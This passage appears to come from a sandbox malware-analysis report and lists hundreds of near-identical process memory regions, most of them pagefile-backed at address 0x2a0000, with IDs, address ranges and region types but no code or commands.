9986 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9987 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9988 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9989 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9990 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9991 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9997 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9998 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9999 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10000 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10001 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10002 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10003 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10004 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10005 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10006 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10007 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10008 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10009 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10010 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10011 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10012 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10013 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10014 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10015 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10016 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10017 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10018 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10019 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10020 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10021 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10022 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10023 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10024 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10030 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10031 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10032 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10033 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10034 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10035 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10036 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10037 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10038 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10039 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10040 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10041 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10042 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10043 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10044 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10045 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10046 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10047 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10048 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10049 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10050 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10051 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10052 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10053 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10054 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10055 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10056 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10057 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10058 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10059 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10060 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10061 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10062 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10063 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10064 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10065 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10066 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10067 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10068 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10069 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10070 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10071 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10072 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10073 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10074 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10075 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10175 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10176 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10177 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10178 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10179 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10180 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10181 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10182 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10183 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10184 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10185 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10186 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10187 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10188 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10189 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10190 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10191 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10192 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10193 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10194 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10195 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10196 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10197 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10198 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10199 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10200 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10201 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10202 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10203 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10204 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10205 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10206 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10207 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10208 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10209 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10210 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10211 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10217 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10218 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10219 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10220 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10221 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10222 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10223 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10224 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10225 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10226 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10227 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10228 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10229 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10230 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10231 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10232 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10233 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10234 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10235 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10236 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10237 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10238 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10239 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10240 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10241 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10242 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10243 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10244 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10245 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10246 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10247 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10248 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10249 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10250 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10251 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10252 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10253 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10254 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10255 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10256 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10257 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10258 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10264 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10265 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10266 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10267 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10268 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10269 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10270 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10271 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10272 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10273 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10274 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10275 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10276 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10277 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10278 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10279 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10280 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10281 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10282 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10283 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10284 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10285 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10286 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10287 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10288 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10289 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10290 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10465 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10466 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10467 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10468 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10469 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10470 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10471 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10472 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10473 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10474 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 